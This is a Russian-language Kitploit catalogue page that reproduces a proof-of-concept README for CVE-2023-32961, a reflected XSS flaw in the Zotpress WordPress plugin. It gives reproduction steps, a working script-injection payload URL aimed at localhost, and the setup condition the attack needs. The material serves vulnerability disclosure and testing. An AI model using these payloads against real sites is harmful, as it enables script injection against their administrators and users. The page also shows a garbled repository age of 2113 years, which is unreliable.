Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-32961 — PoC для CVE-2023-32961 | Kitploit
Инструменты/GitHubGitHub/lourc0d3/cve-2023-32961
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

PoC для CVE-2023-32961

Репозиторий
2113 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-32961

Этот репозиторий посвящён XSS-уязвимости в плагине Zotpress для WordPress.

Детали компонента


Название компонента

Zotpress

Уязвимая версия

≤ 7.3.3

Слаг компонента

zotpress

Ссылка на компонент

https://wordpress.org/plugins/zotpress/

Предварительные требования


Без аутентификации

Детали уязвимости


Краткое описание

Функция get_request_token в zotpress/lib/admin/admin.accounts.oauth.php уязвима для XSS-атаки.

Скачать инструмент

Как воспроизвести (PoC)

  1. Установите расширение oauth для PHP, чтобы вызвать уязвимость. (Это опционально для Zotpress)
  2. Войдите в систему на zotero.org
  3. Должны быть выполнены условия для выполнения функции get_request_token. (только при первом запуске) Отправьте полезную нагрузку следующего вида: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Отправьте следующую полезную нагрузку http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Дополнительная информация

  • Вам потребуется учётная запись на zotero.org.

  • Вам необходимо установить значение oauthState равным 1, чтобы вызвать уязвимость. Если указанная выше полезная нагрузка не срабатывает, вам нужно найти способ установить oauthState в 1.

    • условное выражение:

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • Простая установка расширения php oauth:

    • Однострочная команда:

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • Протестировано в Docker-образе wordpress:latest.

Видео PoC

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

Ссылки


CVE-2023-32961